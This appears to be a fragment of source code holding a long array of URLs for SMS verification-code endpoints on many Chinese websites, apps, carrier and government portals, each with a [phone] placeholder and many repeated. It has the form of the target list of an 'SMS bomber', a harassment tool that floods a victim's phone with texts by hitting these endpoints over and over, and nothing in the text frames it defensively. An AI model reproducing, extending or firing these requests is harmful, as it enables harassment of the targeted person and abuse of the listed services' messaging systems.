"http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.business-steward.com/ticket/application/message/send_msg.php?tel=[phone]&type=forget", + "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]%22%7D&_=1584495050906", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]&learn_stage=0&appChannel=App%20Store&cUDID=5C351103-F887-4932-BC59-58C75875EFDE&lng=106.2849618867906&appVersion=7.5.3&que_city_id=27&os=iOS&enr_city_id=75&openUDID", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]", + "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]&platform=IOS&uid=0&token=bfd31758556", + "https://cfapi.yaomengwang.cn/local/v1/account/regist/sms?mobile=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://my.baihe.com/Getinterregist/captchaAndRegCheck?account=[phone]&type=1", + "https://app.leyou.com.cn/system/sendSms?mobile=[phone]&sign=fb0a624aade8b0e135196025cbc191c2&transtype=reg_m", + "http://passport.ks5u.com/RPAjax.ashx?Param=009&PhoneNum=[phone]", + "https://www.771ka.com/register/checkinfo?clientid=newmobile&newmobile=[phone]&_=1589617672457", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "http://vip.haier.com:80/vipCode/user/sendMobileCode?sendType=codeLogin1&domainName=Haier&mobile=[phone]", + "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=9", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://www.shengjob.com/Resume/PhoneCode_Tem.aspx?Phones=[phone]", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=24", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]&type=1", + "http://www.dgzz1.com:20002/LoginMobileYanZheng?MOBILE=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://tel.kuaishang.cn/ajax.php?act=sendmsg&author=%E9%BD%90%E6%99%A8&fromurls=http%3A%2F%2Fwww.mianfeidianhua.net%2Fhsnzy.html&content=%E6%83%B3%E5%92%A8%E8%AF%A2%E3%80%82&did=382&uid=2010131726&phone=[phone]&_=1551173567919", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://m.yhk188.com/register/sendAppRegMsg.dos?channel=1&mobilephone=[phone]&time=8a0aae56fd56e3d023102a88e57a4a594a1625c5769a666d42a35e5b5933c01b&type=1&version=1.6.1", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://user.yuntuds.net/register_get_valid_number?sign=a316b3d460901f104f9e8e84662640c0&phone_number=[phone]&nwtime=1548162361&_u=acde09261c08497067779e1fd4ee4a6e&version=4.5.1&platform=android&appx=yuntu&apppn=org.fungo.fungolive&channel=tencent&market=32&os_versi", + "http://api.fine3q.com/link-site/api/user/get_verification_code.json?ts=1561901787148&c_id=1&p=a&d_id=861913032338784&ver=3.1.5&mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "https://id.seewo.com/api/recordSEM?systemCode=care&appVersion=%E5%B8%8C%E6%B2%83%E5%AD%A6%E9%99%A2SEM&actionType=1111004&channelName=care&deviceId=&_=1547004660553&userId=[phone]", + "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://m.api.cetv.cn/v2/member?app_version=2.1.0&sign=f631db0bcb5fabc1b76679d9480e4f73&device_id=74:4A:A4:A6:B0:63&time=1561078945566&mobile=[phone]&system_name=android&ip=192.168.43.217&siteid=10001&clientid=1&modules=needcaptcha:1&type=android", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App%20Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", + "http://wx.cq3g.cn/shop/sendSmsCode?phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=%E9%87%8D%E5%BA%86%E5%B8%82&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://app.quanlaoda.com/app.php?&m=code&a=send_login_code&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "https://app.hbooker.com/signup/send_verify_code?callback=jQuery111009421744498287961_1580993309090&account=62634757818&app_version=2.3.102&hashvalue=1b817ef4600f743b4517f40764cd4705&device_token=iPhone-3D34A72B-B07D-4260-BF0F-EDBC96F214B9&verify_type=1&phone_num=1-", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", + "http://api9000.chengqinhr.xyz/app/getQmjzSms/[phone]?appid=com.qgjz.ptjz", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://app.syxwnet.com/?app=member&controller=index&action=validate&do=mobile&mobile=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", + "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]&sendType=1&tokenType=6&_t_=1573784070671&os=pcweb&appId=homework&channel=&plat=wap&cType=pc&fr=&lastfrom=&name=JC_C2_3_20100", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8", + "http://duanxin.diluw.com/index.php?hm=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE@5.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://park.chemi.ren//serverpark/index.php/Api/Mobileapi/getCode?phone=[phone]&action=codeLogin&type=sms&client=android&version=2.4", + "https://api.intsig.net/user/cs/send_emailsms_with_verify?account=[phone]&account_type=mobile&area_code=86&client_app=CamScanner_IP_FREE%405.12.1.1907311855&device_id=4f06e7989623c84b4c88dddc46724ea2&language=zh-cn&type=login_via_vcode", + "http://m.edaogou.mobi/appweb/user.ashx?act=sendCode&typ=register&mobile=[phone]&_=1551173567948", + "https://b.hongkedou.com/phoneVerifyCode/getVerificationCode?phone=[phone]&business=buyer-register", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "http://msg.106117.com/submit_ajax.ashx?callback=jQuery11120017795995642418072_1558097551516&username=[phone]&action=getValidate&_=1558097551517", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "http://j.esf.leju.com/ucenter/islejuuser?mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "http://12345.panzhihua.gov.cn/sms/getSMSCode?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "https://beacons.gcp.gvt2.com/domainreliability/upload", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]&apdToken=APDIDJS_donghang_3880391e1df5928e12b47ebf81c54a6a&geetest_challenge=feb26c08395a9970e3e42026dfd4cb22&geetest_validate=c286a97ff7ddf40bd37ddd8789a5642c&geetest_seccode=c286a97f", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "http://www.yifatong.com/Customers/gettsms?rnd=1570443327.103&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://www.guaguale.men/api.php?act=user&key=rt1BThTaqQjjqbx1RD&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://reg.uuyoyo.com/AshxHandler/AjaxRegHandler.ashx?action=reg_phone_code_send&_=&phone=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://218.29.159.26:9000/website/smsSend?phoneNum=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "https://api.xinmaotong.cn/flw-auth/code?phone=[phone]&type=0", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://member.cabplink.com/sso/sendRegisterSMS.zaction?mobile=[phone]", + "http://hk-dns.sskweb.cn/api.php?act=user&key=XsWxsZDyh58V9whXWR&phone=[phone]", + "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]&appId=ios_15196397349756&t=1565073179646&sign=70723c9c61730237de0b97a02395e103", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "https://cloud.maitao.com/auth/code?cityId=2&uid=&cfbundleversion=5.12.0&imei=32E30496-2A31-463B-A1BD-75B005303E41&channelid=AppStore&devicetoken=69103da60f6eca7a15a995f4f33371ce6413567d5df01d1335f6ab25a47a2f3c&fromapp=1&token=05F452E3F79B7410AC8962C7445483E81AD2ACC", + "https://pass.cctalk.com/v2/Handler/UCenter?action=SendMsg&mobile=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=重庆市&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://api.xtgyl.cn/index.php/api_v1/api.app.login/sendCaptcha?mobile=[phone]", + "http://app.jiayouxueba.cn/api/v3/sms/getcode?mobile=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", + 